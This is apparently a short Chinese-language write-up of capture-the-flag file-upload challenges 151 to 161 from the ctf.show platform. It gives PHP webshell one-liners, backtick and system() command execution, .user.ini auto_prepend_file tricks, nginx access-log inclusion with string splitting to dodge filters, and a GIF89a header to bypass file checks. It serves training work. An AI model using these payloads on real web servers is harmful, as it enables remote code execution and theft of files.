ctf_show-web入門-檔案上傳(151-161)
阿新 • • 發佈:2021-08-25
- WEB151
抓包改個名字即可
- WEB152
同上,隨便傳個圖片馬
- WEB153
考點是.user.ini
注意上傳圖片目錄下有個index.php 即/upload/index.php
首先上傳一個1.png圖片馬
上傳auto_prepend_file = 1.png 的.user.ini
這樣.user.ini所在目錄會全部的檔案包含1.png
- WEB154
同上過濾了php
一句話木馬可以寫成:<?= ?>等價於echo
- WEB155
同上
- WEB156
同上
過濾了[] 可以用{}
<?=eval($_POST{attack});?>
- WEB157
繼續過濾了{}和;
那就直接不用一句話木馬,直接system('cat flag.ph*')
- WEB 158/159
同上,用<?= `cat ../f*`?>
- WEB160
過濾了括號和反引號,所以不好上傳指令
所以用.user.ini 包含圖片
圖片包含日誌
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
這裡不能.user.ini直接包含日誌,原因上面說了
另外這裡過濾了log所以要拼接一下
- WEB161
對檔案頭檢測,
GIF89A用來繞過檢測